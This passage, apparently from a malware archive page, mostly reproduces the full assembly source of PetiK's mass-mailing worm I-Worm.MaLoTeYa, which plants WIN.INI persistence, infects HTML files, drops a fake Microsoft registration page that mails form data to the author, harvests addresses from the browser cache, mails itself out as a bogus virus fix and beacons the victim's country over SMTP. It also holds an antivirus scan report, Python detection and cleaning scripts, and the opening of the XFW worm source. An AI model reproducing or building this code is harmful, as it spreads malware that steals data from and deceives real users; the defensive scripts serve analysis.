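"Carnet d'adresses"="C:\\WINDOWS\\Carnet.vbs"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Delirious]
"InfectNormal"="OK"

[HKEY_CURRENT_USER\Software\Bush]
"alice@example.net"="OK"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.petikvx.fr.fm"
"""

# Executables the worms on this page register through the run= line of
# WIN.INI (Bush, MaLoTeYa, XFW), matched as upper-cased path suffixes.
INI_RUN_IOCS = ("\\SYSTEM\\BIOS.EXE", "\\RUNW32.EXE", "\\SYSTEM\\SERVICES.EXE")

RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
# (key, value name, expected data or None for "any data", label)
REG_IOCS = (
    (RUN_KEY, "Carnet d'adresses", None, "I-Worm.Bush Run value"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Delirious", "InfectNormal", "OK",
     "Delirious Normal template infection marker"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page",
     "http://www.petikvx.fr.fm", "MaLoTeYa HTML payload start page"),
)
BUSH_ADDR_KEY = r"HKEY_CURRENT_USER\Software\Bush"


def parse_ini(text):
    """Return {section: {key: value}} with section and key names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def parse_reg_export(text):
    """Return {key path: {value name: data}} from a regedit .reg export.
    Only string values are decoded ("name"="data" and the default value @=),
    which is all these artefacts use; other value types stay as raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, data = line.split("=", 1)
            name = "" if name == "@" else name.strip('"')
            if data.startswith('"') and data.endswith('"'):
                # regedit escapes quotes and backslashes inside string data
                data = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def find_iocs(win_ini_text, reg_text):
    """Return a list of (source, label, evidence) tuples, one per artefact found."""
    findings = []
    windows = parse_ini(win_ini_text).get("windows", {})
    for entry in ("run", "load"):
        value = windows.get(entry, "")
        for ioc in INI_RUN_IOCS:
            if ioc in value.upper():
                findings.append(("win.ini", f"{entry}= persistence", value))
                break
    reg = parse_reg_export(reg_text)
    for key, name, expected, label in REG_IOCS:
        data = reg.get(key, {}).get(name)
        if data is None:
            continue
        if expected is None or data.lower() == expected.lower():
            findings.append(("registry", label, f"{key}\\{name} = {data}"))
    # Carnet.vbs records every address it has mailed as a value named after
    # the address, so the key doubles as a list of the people who got a copy.
    for name, data in reg.get(BUSH_ADDR_KEY, {}).items():
        if data == "OK":
            findings.append(("registry", "I-Worm.Bush harvested address", name))
    return findings


if __name__ == "__main__":
    for source, label, evidence in find_iocs(SAMPLE_WIN_INI, SAMPLE_REG):
        print(f"{source:9} {label:42} {evidence}")
```

On a real image the WIN.INI comes from the \WINDOWS folder and the .reg text from exporting the hives with regedit; note that the Bush Run value is written through SHSetValueA with a data length of 8, so the stored path may be truncated, which is why the scan matches on the value name alone.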

comment #
Name   : I-Worm.MaLoTeYa
Author : PetiK
Date   : July 2nd - July 6th
Size   : 12288 bytes
Action : It copies itself to \WINDOWS\RUNW32.EXE and to \WINDOWS\SYSTEM\MSVA.EXE.
         It alters the run= line and creates the VARegistered.htm file in the
         StartUp folder; this file sends some information to
         petik@multimania.com and displays a fake message.
         If the platform is Windows 95/98, the process registers itself as a
         service process.
         It infects all *.htm and *.html files by writing a VB script at their
         end. It then checks whether an Internet connection exists, scans all
         *.htm* files in the "Temporary Internet Files" folder for e-mail
         addresses and sends a copy of itself to them.
         The worm also sends an e-mail to "petik@multimania.com" with the
         country of the user.
         When the user opens the System Properties window, its title is
         changed to "PetiK always is with you :-)".
Greets to Benny, ZeMacroKiller98, Mandragore.
         tasm32 /M /ML Maloteya
         tlink32 -Tpe -aa -x Maloteya,,,import32
#

.586p
.model flat
.code
JUMPS
callx macro a
      extrn a:proc
      call a
endm
include useful.inc

;----------------------------------------
;Installation of the worm in the computer
;----------------------------------------
DEBUT:
VERIF:  push    00h
        callx   GetModuleHandleA
        push    50h
        push    offset szOrig
        push    eax
        callx   GetModuleFileNameA
        push    50h
        push    offset szCopie
        callx   GetWindowsDirectoryA
        @pushsz "\RUNW32.EXE"
        push    offset szCopie
        callx   lstrcat
        push    50h
        push    offset szCopb
        callx   GetSystemDirectoryA
        @pushsz "\MSVA.EXE"
        push    offset szCopb
        callx   lstrcat
        push    offset szOrig
        push    offset szCopie
        callx   lstrcmp
        test    eax,eax
        jz      CACHE
COPIE:  push    00h
        push    offset szCopie
        push    offset szOrig
        callx   CopyFileA
        push    00h
        push    offset szCopb
        push    offset szOrig
        callx   CopyFileA
WININI: push    50
        push    offset szWinini
        callx   GetWindowsDirectoryA
        @pushsz "\\WIN.INI"
        push    offset szWinini
        callx   lstrcat
        push    offset szWinini
        push    offset szCopie
        @pushsz "run"
        @pushsz "windows"
        callx   WritePrivateProfileStringA

;--------------------------------------------------
;Create VARegistered.htm file in the StartUp folder
;--------------------------------------------------
C_GET:  @pushsz "SHELL32.dll"
        callx   LoadLibraryA
        mov     SHELLhdl,eax
        @pushsz "SHGetSpecialFolderPathA"
        push    SHELLhdl
        callx   GetProcAddress
        mov     getfolder,eax
        push    00h
        push    07h                       ; STARTUP Folder
        push    offset StartUp
        push    00h
        call    [getfolder]
        test    eax,eax
        je      F_HTM
        @pushsz "\VARegistered.htm"
        push    offset StartUp
        callx   lstrcat
HTM:    push    00h
        push    80h
        push    02h
        push    00h
        push    01h
        push    40000000h
        push    offset StartUp
        callx   CreateFileA
        mov     [FileHdl],eax
        push    00h
        push    offset octets
        push    HTMTAILLE
        push    offset htmd
        push    [FileHdl]
        callx   WriteFile
        push    [FileHdl]
        callx   CloseHandle
F_HTM:  push    [SHELLhdl]
        callx   FreeLibrary

F_MESS: push    1000
        callx   Sleep
        push    1040h
        @pushsz "Microsoft Virus Alert"
        @pushsz "Your system does not appear infected with I-Worm.Magistr"
        push    00h
        callx   MessageBoxA
        jmp     FIN

;---------------------------------
;Service process for Windows 95/98
;---------------------------------
CACHE:  @pushsz "KERMEL32.dll"
        callx   GetModuleHandleA
        @pushsz "RegisterServiceProcess"
        push    eax
        callx   GetProcAddress
        xchg    ecx,eax
        jecxz   D_INF
        push    01h
        push    00h
        call    ecx
D_INF:  push    50
        push    offset szCurrent
        callx   GetCurrentDirectoryA
        push    offset szCurrent
        callx   SetCurrentDirectoryA

;--------------------------------------------
;Infect all *.htm* files of the Windows folder
;--------------------------------------------
FFF:    push    offset Search
        @pushsz "*.htm*"                  ; Search some *.htm* files...
        callx   FindFirstFileA
        inc     eax
        je      F_INF
        dec     eax
        mov     [htmlHdl],eax
i_file: call    infect                    ; and infect them
        push    offset Search
        push    [htmlHdl]
        callx   FindNextFileA
        test    eax,eax
        jne     i_file
        push    [htmlHdl]
        callx   FindClose
F_INF:

;-----------------------
; Check if we r conected
;-----------------------
NET1:   @pushsz "WININET.dll"
        callx   LoadLibraryA
        test    eax,eax
        jz      FIN
        mov     WNEThdl,eax
        @pushsz "InternetGetConnectedState"
        push    WNEThdl
        callx   GetProcAddress
        test    eax,eax
        jz      FIN
        mov     netcheck,eax
        jmp     NET2
NET2:   push    00h
        push    offset Temp
        call    [netcheck]                ; Connect to Internet ??
        dec     eax
        jnz     NET2
FINNET: push    [WNEThdl]
        callx   FreeLibrary
PAYS:   push    50
        push    offset szSystemini
        callx   GetWindowsDirectoryA
        @pushsz "\Win.ini"
        push    offset szSystemini
        callx   lstrcat
        push    offset szSystemini
        push    20
        push    offset org_pays
        push    offset Default
        @pushsz "sCountry"
        @pushsz "intl"
        callx   GetPrivateProfileStringA

;------------------------------------------------------------------
; Send the name of country to "petik@multimania.com" (perhaps bugs)
;------------------------------------------------------------------
SMTP:   push    offset WSA_Data           ; Winsock
        push    0101h                     ; ver 1.1 (W95+)
        callx   WSAStartup
        or      eax,eax
        jnz     INIT                      ; Error ?
        @pushsz "obelisk.mpt.com.uk"
        callx   gethostbyname             ; convert SMTP Name to an IP address
        xchg    ecx,eax
        jecxz   FREE_WIN
        mov     esi,[ecx+12]              ; Fetch IP address
        lodsd
        push    eax
        pop     [ServIP]
        push    00h
        push    01h                       ; SOCK_STREAM
        push    02h                       ; AF_INET
        callx   socket                    ; Create Socket
        mov     work_socket,eax
        inc     eax
        jz      FREE_WIN
        push    16                        ; Size of connect structure
        call    @1                        ; Connect structure
        dw      2                         ; Family
        db      0, 25                     ; Port number
ServIP  dd      0                         ; IP of server
        db      8 dup(0)                  ; Unused
@1:     push    [work_socket]
        callx   connect
        inc     eax
        jz      CLOSE_SOC
        lea     esi,Send_M
        mov     bl,6
        xor     eax,eax

Command_Loop:
        call    @2                        ; Time-out:
Time_Out:
        dd      5                         ; Seconds
        dd      0                         ; Milliseconds
@2:     push    eax                       ; Not used (Error)
        push    eax                       ; Not used (Writeability)
        call    @3
Socket_Set:
        dd      1                         ; Socket count
work_socket dd  0                         ; Socket
@3:     push    eax                       ; Unused
        callx   select
        dec     eax
        jnz     CLOSE_SOC
        push    00h
        push    512
        push    offset buf_recv
        push    [work_socket]
        callx   recv                      ; Received data from socket
        xchg    ecx,eax
        jecxz   CLOSE_SOC                 ; Connection closed ?
        inc     ecx
        jz      CLOSE_SOC                 ; Error ?
        or      ebx,ebx
        jz      CLOSE_SOC                 ; Received stuff was QUIT reply ? then close up.
        mov     al,'2'                    ; "OK" reply
        cmp     bl,2                      ; Received stuff was the DATA reply ?
        jne     Check_Reply
        inc     eax
Check_Reply:
        scasb
        je      Wait_Ready
        lea     esi,Send_M + (5*4)
        mov     bl,1

Wait_Ready:
        xor     ecx,ecx
        lea     eax,Time_Out
        push    eax                       ; Time-out ??
        push    ecx                       ; not used (Error)
        lea     eax,Socket_Set
        push    eax                       ; Writeability
        push    ecx                       ; Not used (Readability)
        push    ecx                       ; Unused
        callx   select
        dec     eax
        jnz     CLOSE_SOC
        cld
        lodsd
        movzx   ecx,ax
        shr     eax,16
        add     eax,ebp
        push    ecx
        push    00h
        push    ecx                       ; Size of buffer
        push    eax                       ; Buffer
        push    [work_socket]
        callx   send                      ; Send command and data to the socket
        pop     ecx
        cmp     eax,ecx
        jne     CLOSE_SOC
        dec     ebx
        jns     Command_Loop

CLOSE_SOC:
        push    [work_socket]
        callx   closesocket
FREE_WIN:
        callx   WSACleanup
INIT:   @pushsz "MAPI32.dll"
        callx   LoadLibraryA
        test    eax,eax
        jz      FIN
        mov     MAPIhdl,eax
        @pushsz "MAPISendMail"
        push    MAPIhdl
        callx   GetProcAddress
        test    eax,eax
        jz      FIN
        mov     sendmail,eax
D_GET:  @pushsz "SHELL32.dll"
        callx   LoadLibraryA
        mov     SHELLhdl,eax
        @pushsz "SHGetSpecialFolderPathA"
        push    SHELLhdl
        callx   GetProcAddress
        mov     getfolder,eax
        push    00h
        push    20h                       ; MSIE Cache Folder
        push    offset Cache
        push    00h
        call    [getfolder]
        push    [SHELLhdl]
        callx   FreeLibrary
        push    offset Cache
        callx   SetCurrentDirectoryA

;-----------------------------------------------------------
; Search email addresses into the "Temporary Internet Files"
;-----------------------------------------------------------
FFF2:   push    offset Search
        @pushsz "*.htm*"
        callx   FindFirstFileA
        inc     eax
        je      END_SPREAD
        dec     eax
        mov     [htmlHdl],eax
i_htm:  call    infect2
        push    offset Search
        push    [htmlHdl]
        callx   FindNextFileA
        test    eax,eax
        jne     i_file
        push    [htmlHdl]
        callx   FindClose
END_SPREAD:
        push    [MAPIhdl]
        callx   FreeLibrary

;---------------------------------------------------------------
; Changes the title of the System Properties window on Wednesday
;---------------------------------------------------------------
DATE:   push    offset SystemTime
        callx   GetSystemTime
        cmp     [SystemTime.wDayOfWeek],3
        jne     FIN
WIN1:   @pushsz "Propriétés Systême"
        push    00h
        callx   FindWindowA
        test    eax,eax
        jz      WIN2
        jmp     WIN3
WIN2:   @pushsz "System Properties"       ; Change title some windows
        push    00h
        callx   FindWindowA
        test    eax,eax
        jz      WIN1
WIN3:   mov     edi,eax
        @pushsz "PetiK always is with you :-)"
        push    edi
        callx   SetWindowTextA
        jmp     WIN1
FIN:    push    00h
        callx   ExitProcess

; append d_htm to the file found by FindFirst/FindNext, then mark it READONLY
infect: pushad
        mov     esi,offset Search.cFileName
        push    esi
        callx   GetFileAttributesA
        cmp     eax,1                     ; READONLY
        je      end_infect
        push    00h
        push    80h
        push    03h
        push    00h
        push    01h
        push    40000000h
        push    esi
        callx   CreateFileA
        xchg    eax,edi
        inc     edi
        je      end_infect
        dec     edi
        push    02h                       ; FILE_END
        push    00h
        push    [Dist]
        push    edi
        callx   SetFilePointer
        push    00h
        push    offset octets
        push    HTMSIZE
        push    offset d_htm
        push    edi
        callx   WriteFile
        push    edi
        callx   CloseHandle
        push    01h
        push    esi
        callx   SetFileAttributesA
end_infect:
        popad
        ret

; map the file found in the cache folder and mail a copy to each mailto: address
infect2:pushad
        push    00h
        push    80h
        push    03h
        push    00h
        push    01h
        push    80000000h
        push    offset Search.cFileName
        callx   CreateFileA
        inc     eax
        je      END_SPREAD
        dec     eax
        xchg    eax,ebx
        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    02h                       ; PAGE_READONLY
        push    eax
        push    ebx
        callx   CreateFileMappingA
        test    eax,eax
        je      F1
        xchg    eax,ebp
        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    04h                       ; FILE_MAP_READ
        push    ebp
        callx   MapViewOfFile
        test    eax,eax
        je      F2
        xchg    eax,esi
        push    00h
        push    ebx
        callx   GetFileSize
        xchg    eax,ecx
        jecxz   F3
d_scan_mail:
        call    @melto
        db      'mailto:'
@melto: pop     edi
scn_mail:
        pushad
        push    07h
        pop     ecx
        rep     cmpsb
        popad
        je      scan_mail
        inc     esi
        loop    scn_mail
F3:     push    esi
        callx   UnmapViewOfFile
F2:     push    ebp
        callx   CloseHandle
F1:     push    ebx
        callx   CloseHandle
        popad
        ret

scan_mail:
        xor     edx,edx
        add     esi,7                     ; size of the string "mailto:"
        mov     edi,offset m_addr
        push    edi
p_car:  lodsb                             ; next character
        cmp     al,' '                    ; space ??
        je      car_s
        cmp     al,'"'                    ; end character ??
        je      car_f
        cmp     al,''''                   ; end character ??
        je      car_f
        cmp     al,'@'                    ; @ character ??
        jne     not_a
        inc     edx
not_a:  stosb
        jmp     p_car                     ; jmp to nxt char
car_s:  inc     esi
        jmp     p_car
car_f:  xor     al,al
        stosb
        pop     edi
        test    edx,edx                   ; exist @ ??
        je      d_scan_mail
        call    ENVOIE
        jmp     d_scan_mail

ENVOIE: xor     eax,eax
        push    eax
        push    eax
        push    offset Message
        push    eax
        push    [MAPIh]
        call    [sendmail]
        ret

.data
namer       db 50 dup (0)
szCopb      db 50 dup (0)
szCopie     db 50 dup (0)
szCurrent   db 50 dup (0)
szOrig      db 50 dup (0)
szSystemini db 50 dup (0)
szWinini    db 50 dup (0)
Cache       db 70 dup (0)
StartUp     db 70 dup (0)
m_addr      db 128 dup (?)
WSA_Data    db 400 dup (0)
buf_recv    db 512 dup (0)
Default     db 0
FileHdl     dd ?
octets      dd ?
netcheck    dd ?
sendmail    dd ?
getfolder   dd ?
htmlHdl     dd ?
MAPIhdl     dd ?
SHELLhdl    dd ?
WNEThdl     dd ?
RegHdl      dd ?
Dist        dd 0
Temp        dd 0
MAPIh       dd 0
WormName    db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h
Origine     db "Made In France",00h

Message     dd ?                          ; MapiMessage: ulReserved
            dd offset sujet               ; lpszSubject
            dd offset corps               ; lpszNoteText
            dd ?                          ; lpszMessageType
            dd offset date                ; lpszDateReceived
            dd ?                          ; lpszConversationID
            dd 2                          ; flFlags: MAPI_RECEIPT_REQUESTED ?? MAPI_UNREAD ??
            dd offset MsgFrom             ; lpOriginator
            dd 1                          ; nRecipCount
            dd offset MsgTo               ; lpRecips
            dd 1                          ; nFileCount
            dd offset AttachDesc          ; lpFiles

MsgFrom     dd ?                          ; MapiRecipDesc: ulReserved
            dd ?                          ; ulRecipClass
            dd offset NameFrom            ; lpszName
            dd offset MailFrom            ; lpszAddress
            dd ?                          ; ulEIDSize
            dd ?                          ; lpEntryID

MsgTo       dd ?
            dd 1                          ; MAPI_TO
            dd offset NameTo
            dd offset m_addr
            dd ?
            dd ?

AttachDesc  dd ?                          ; MapiFileDesc: ulReserved
            dd ?                          ; flFlags
            dd ?                          ; character in text to be replaced by attachment
            dd offset szCopb              ; Full path name of attachment file
            dd ?                          ; lpszFileName
            dd ?                          ; lpFileType

sujet       db "New Virus Alert !!",00h
corps       db "This is a fix against I-Worm.Magistr.",0dh,0ah
            db "Run the attached file (MSVA.EXE) to detect, repair and "
            db "protect you against this malicious worm.",00h
date        db "2001/07/01 15:15",00h     ; YYYY/MM/DD HH:MM
NameFrom    db "Microsoft Virus Alert"
MailFrom    db "virus_alert@microsoft.com",00h
NameTo      db "Customer",00h

Send_M:     dw fHELO-dHELO
            dw fFROM-dFROM
            dw fRCPT-dRCPT
            dw fDATA-dDATA
            dw fMAIL-dMAIL
            dw fQUIT-dQUIT

dHELO   db 'HELO obelisk.mpt.com.uk',0dh,0ah
fHELO:
dFROM   db 'MAIL FROM:<maloteya@petik.com>',0dh,0ah
fFROM:
dRCPT   db 'RCPT TO:<petik@multimania.com>',0dh,0ah
fRCPT:
dDATA   db 'DATA',0dh,0ah
fDATA:
dMAIL:  db 'From: "MaLoTeYa",<maloteya@petik.com>',0dh,0ah
        db 'Subject: Long Live the Worm',0dh,0ah
        db 'Pays d''origine : '
org_pays db 20 dup (0)
        db '',0dh,0ah
        db '.',0dh,0ah
fMAIL:
dQUIT   db 'QUIT',0dh,0ah
fQUIT:

htmd:   db "<html><head><title>Virus Alert Registration</title></head>",0dh,0ah
        db "<SCRIPT LANGUAGE=""VBScript"">",0dh,0ah
        db "Sub control",0dh,0ah
        db "dim i",0dh,0ah
        db "dim caract",0dh,0ah
        db "formu.action=""""",0dh,0ah
        db "If formu.mail.value="""" Then",0dh,0ah
        db " MsgBox ""Forgotten EMail""",0dh,0ah
        db " Else",0dh,0ah
        db " For i= 1 to len(formu.mail.value)",0dh,0ah
        db " caract=mid(formu.mail.value,i,1)",0dh,0ah
        db " If caract=""@"" Then",0dh,0ah
        db " Exit For",0dh,0ah
        db " End If",0dh,0ah
        db " Next",0dh,0ah
        db " If caract=""@"" Then",0dh,0ah
        db " formu.action=""mailto:petik@multimania.com""",0dh,0ah
        db " Else",0dh,0ah
        db " MsgBox ""Invalid EMail""",0dh,0ah
        db " End If",0dh,0ah
        db "End If",0dh,0ah
        db "End Sub",0dh,0ah
        db "</SCRIPT>",0dh,0ah
        db "<body bgcolor=white text=black>",0dh,0ah
        db "<p align=""center""><font size=""5"">Microsoft Virus Alert Registration</font></p>",0dh,0ah
        db "<p align=""left""><font size=""3"">Please fill out this form. </font>",0dh,0ah
        db "<font>You must be connected to internet.</font></p>",0dh,0ah
        db "<p></p>",0dh,0ah
        db "<form name=""formu"" action method=""POST"" enctype=""text/plan"">",0dh,0ah
        db "<p>Name : <input name=""nom"" type=""TEXT"" size=""40""></p>",0dh,0ah
        db "<p>Firstname : <input name=""prenom"" type=""TEXT"" size=""40""></p>",0dh,0ah
        db "<p>City : <input name=""ville"" type=""TEXT"" size=""40""></p>",0dh,0ah
        db "<p>Country : <input name=""pays"" type=""TEXT"" size=""40""></p>",0dh,0ah
        db "<p>E-Mail : <input name=""mail"" type=""TEXT"" size=""40""></p>",0dh,0ah
        db "<p><input type=""submit"" value=""Submit"" name=""B1"" onclick=""control""></p>",0dh,0ah
        db "<p></p>",0dh,0ah
        db "<p align=""center""><font><B>AFTER REGISTRATION YOU CAN DELETE THIS FILE</B></font></p>",0dh,0ah
        db "</form></body></html>",00h
HTMTAILLE equ $-htmd

d_htm:  db "",0dh,0ah,0dh,0ah
        db "<SCRIPT Language=VBScript>",0dh,0ah
        db "On Error Resume Next",0dh,0ah
        db "Set fso=CreateObject(""Scripting.FileSystemObject"")",0dh,0ah
        db "Set ws=CreateObject(""WScript.Shell"")",0dh,0ah
        db "ws.RegWrite ""HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"",""http://www.petikvx.fr.fm""",0dh,0ah
        db "document.Write ""<font face='verdana' color=red size='2'>This file is infected by my new virus"
        db "<br>Written by PetiK (c)2001"
        db "<br>HTML/W32.MaLoTeYa.Worm<br></font>""",0dh,0ah
        db "</SCRIPT>",0dh,0ah
HTMSIZE equ $-d_htm

OSVERSIONINFO struct
  dwOSVersionInfoSize dd ?
  dwMajorVersion      dd ?
  dwMinorVersion      dd ?
  dwBuildNumber       dd ?
  dwPlatformId        dd ?
  szCSDVersion        db 128 dup (?)
OSVERSIONINFO ends

SYSTIME struct
  wYear         WORD ?
  wMonth        WORD ?
  wDayOfWeek    WORD ?
  wDay          WORD ?
  wHour         WORD ?
  wMinute       WORD ?
  wSecond       WORD ?
  wMillisecond  WORD ?
SYSTIME ends

MAX_PATH equ 260

FILETIME struct
  dwLowDateTime   dd ?
  dwHighDateTime  dd ?
FILETIME ends

WIN32_FIND_DATA struct
  dwFileAttributes   dd ?
  ftCreationTime     FILETIME ?
  ftLastAccessTime   FILETIME ?
  ftLastWriteTime    FILETIME ?
  nFileSizeHigh      dd ?
  nFileSizeLow       dd ?
  dwReserved0        dd ?
  dwReserved1        dd ?
  cFileName          db MAX_PATH dup (?)
  cAlternateFileName db 13 dup (?)
                     db 3 dup (?)
WIN32_FIND_DATA ends

OSVer      OSVERSIONINFO <>
SystemTime SYSTIME <>
Search     WIN32_FIND_DATA <>

end DEBUT

File Maloteya.exe received on 05.16.2009 17:52:03 (CET)

Antivirus          Version          Last Update
a-squared          4.0.0.101        2009.05.16
AhnLab-V3          5.0.0.2          2009.05.16
AntiVir            7.9.0.168        2009.05.15
Antiy-AVL          2.0.3.1          2009.05.15
Authentium         5.1.2.4          2009.05.16
Avast              4.8.1335.0       2009.05.15
AVG                8.5.0.336        2009.05.15
BitDefender        7.2              2009.05.16
CAT-QuickHeal      10.00            2009.05.15
ClamAV             0.94.1           2009.05.16
Comodo             1157             2009.05.08
DrWeb              5.0.0.12182      2009.05.16
eSafe              7.0.17.0         2009.05.14
eTrust-Vet         31.6.6508        2009.05.16
F-Prot             4.4.4.56         2009.05.16
F-Secure           8.0.14470.0      2009.05.15
Fortinet           3.117.0.0        2009.05.16
GData              19               2009.05.16
Ikarus             T3.1.1.49.0      2009.05.16
K7AntiVirus        7.10.737         2009.05.16
Kaspersky          7.0.0.125        2009.05.16
McAfee             5616             2009.05.15
McAfee+Artemis     5616             2009.05.15
McAfee-GW-Edition  6.7.6            2009.05.15
Microsoft          1.4602           2009.05.16
NOD32              4080             2009.05.15
Norman             6.01.05          2009.05.16
nProtect           2009.1.8.0       2009.05.16
Panda              10.0.0.14        2009.05.16
PCTools            4.4.2.0          2009.05.16
Prevx              3.0              2009.05.16
Rising             21.29.52.00      2009.05.16
Sophos             4.41.0           2009.05.16
Sunbelt            3.2.1858.2       2009.05.16
Symantec           1.4.4.12         2009.05.16
TheHacker          6.3.4.1.326      2009.05.15
TrendMicro         8.950.0.1092     2009.05.15
VBA32              3.12.10.5        2009.05.16
ViRobot            2009.5.15.1737   2009.05.15
VirusBuster        4.6.5.0          2009.05.16

Additional information
File size: 12288 bytes
MD5:  eb7bea183626119bc54c4ab1de80c606
SHA1: 1f022ad7156e8d510168b7ba441afeb966edb828

Result (38 detection names reported by the 40 engines; the report does not preserve which engine returned which name):
Email-Worm.Win32.Petik!IK, Win32/PetTick.12288, Worm/Petik.4, Worm/Win32.Win32, W32/Malware!8c02, Win32:Petik-Maloteya, I-Worm/Petik.D, Win32.Matoleya.A@mm, W32.Petik, Worm.Petik-1, Worm.Win32.Petik.F, Win32.Petik.12288, Win32/Petik.12288, W32/Malware!8c02, Email-Worm.Win32.Petik, W32/Sabak.A!worm.im, Win32.Matoleya.A@mm, Email-Worm.Win32.Petik, Email-Worm.Win32.Petik, Email-Worm.Win32.Petik, W32/PetTick@MM, W32/PetTick@MM, Worm.Petik.4, Worm:Win32/Pet_tik.E@mm, Win32/Petik.F, W32/Pet_Tick.12288.A, W32/Petik.F, VBS.Petik.F, Medium Risk Malware, Worm.Mail.Petik.q, W32/Petik-E, BehavesLike.Win32.Malware (v), W95.Pet_Tick.gen, W32/PetTick@MM, WORM_PET.TICK.G, Win32.Worm.Petik.12288, I-Worm.Win32.PetTick.12288, VBS.Petik.F
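The infect routine above appends d_htm at FILE_END and then sets the file's attributes to exactly READONLY (1); on the next run it skips only files whose attributes equal 1, so a page that carries any other bit (ARCHIVE, say) gets a second copy appended each time. A cleaner therefore has to strip every trailing copy, not just the last one, and has to clear the read-only bit before it can write. The following is an added example, not PetiK's code: a Python detector and disinfector for the appended block. The sample pages are constructed; the marker strings come from the d_htm bytes in the source above.

```python
"""Detect and strip the VBScript block I-Worm.MaLoTeYa appends to *.htm files.
Added example; not PetiK's code. The samples are constructed from the marker
lines of the d_htm payload: the block starts with CRLF CRLF <SCRIPT
Language=VBScript> and ends with </SCRIPT> CRLF."""
import os
import stat

OPEN_TAG = b"<SCRIPT Language=VBScript>"
CLOSE_TAG = b"</SCRIPT>\r\n"
WORM_NAME = b"HTML/W32.MaLoTeYa.Worm"
LEADER = b"\r\n\r\n"

# Constructed: the worm's appended block, reduced to the lines that identify it.
PAYLOAD = (
    LEADER + OPEN_TAG + b"\r\n"
    b"On Error Resume Next\r\n"
    b'Set ws=CreateObject("WScript.Shell")\r\n'
    b'ws.RegWrite "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.petikvx.fr.fm"\r\n'
    b"document.Write \"<font face='verdana' color=red size='2'>This file is infected by my new virus"
    b"<br>Written by PetiK (c)2001<br>HTML/W32.MaLoTeYa.Worm<br></font>\"\r\n"
    + CLOSE_TAG
)

ORIGINAL = b"<html><head><title>page</title></head><body>Hello</body></html>\r\n"
INFECTED_ONCE = ORIGINAL + PAYLOAD
INFECTED_TWICE = ORIGINAL + PAYLOAD + PAYLOAD   # re-infected, see lead-in
# A page with its own VBScript block and no worm marker must be left alone.
LEGIT_SCRIPT = ORIGINAL + b'<SCRIPT Language=VBScript>\r\nMsgBox "hi"\r\n</SCRIPT>\r\n'


def find_trailing_block(data: bytes):
    """Return the start offset of a worm block that ends the file, or None.
    The worm writes at FILE_END, so its block is always the last one; a
    genuine trailing <SCRIPT> block without the worm's name string is ignored."""
    if not data.rstrip(b"\r\n").endswith(b"</SCRIPT>"):
        return None
    start = data.rfind(OPEN_TAG)
    if start < 0 or WORM_NAME not in data[start:]:
        return None
    if start >= len(LEADER) and data[start - len(LEADER):start] == LEADER:
        start -= len(LEADER)          # drop the two blank lines written first
    return start


def is_infected(data: bytes) -> bool:
    return find_trailing_block(data) is not None


def clean(data: bytes):
    """Strip every trailing worm block. Returns (clean_bytes, blocks_removed)."""
    removed = 0
    while True:
        start = find_trailing_block(data)
        if start is None:
            return data, removed
        data = data[:start]
        removed += 1


def clean_file(path: str) -> int:
    """Disinfect one file in place and return the number of blocks removed.
    Clears the read-only bit the worm set, otherwise the rewrite fails."""
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned, removed = clean(data)
    if removed:
        os.chmod(path, os.stat(path).st_mode | stat.S_IWRITE)
        with open(path, "wb") as fh:
            fh.write(cleaned)
    return removed


if __name__ == "__main__":
    for label, sample in (("once", INFECTED_ONCE), ("twice", INFECTED_TWICE),
                          ("clean", ORIGINAL), ("legit script", LEGIT_SCRIPT)):
        print(f"{label:13} infected={is_infected(sample)} removed={clean(sample)[1]}")
```

Run clean_file over every *.htm* under the folders the worm walks (the directory it was started from and the Temporary Internet Files folder) and also reset the Start Page value that the script sets, since cleaning the pages does not undo it.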

comment #
Name   : I-Worm.XFW (Extra French Worm)
Author : PetiK
Date   : July 10th - August 3rd
Size   : 5632 bytes (compressed with UPX)
Action : It copies itself to \SYSTEM\Services.exe and adds the value
         "Run Services"="\SYSTEM\Services.exe" to the run services key. It
         alters the run= line of the WIN.INI file.
         It copies WSOCK32.DLL to WSOCK32.PTK and patches the original file by
         writing "PetiK" into it. It displays a message and creates
         \WINDOWS\Tool_PetiK.txt, which explains how to repair WSOCK32.DLL.
         If the worm runs from the \SYSTEM folder, it searches every DLL file
         of the current folder (SYSTEM here) and writes a copy of itself next
         to each one with the ".EXE" extension appended:
              FILE.DLL ==>> FILE.DLL.EXE
         Finally, if the computer is connected, it creates a VBS file that
         spreads with Outlook.
To delete :
         del \WINDOWS\SYSTEM\Wsock32.dll
         ren \WINDOWS\SYSTEM\Wsock32.ptk \WINDOWS\SYSTEM\Wsock32.dll
         del \WINDOWS\SYSTEM\Services.exe
         del \WINDOWS\SYSTEM\*.dll.exe
         del \WINDOWS\Tool_PetiK.txt
         del the entry after run= in the WIN.INI file
         del C:\.vbs

         tasm32 /M /ML XFW.asm
         tlink32 -Tpe -aa -x XFW.obj,,,import32
         upx -9 XFW.exe
#

.586p
.model flat
.code
;JUMPS
callx macro a
      extrn a:proc
      call a
endm
include useful.inc

DEBUT:
VERIF:  push    00h
        callx   GetModuleHandleA
        push    50h
        push    offset szOrig
        push    eax
        callx   GetModuleFileNameA
        jmp     INET
        push    50h
        push    offset szCopie
        callx   GetSystemDirectoryA
        @pushsz "\SERVICES.EXE"
        push    offset szCopie
        callx   lstrcat
        push    offset szOrig
        push    offset szCopie
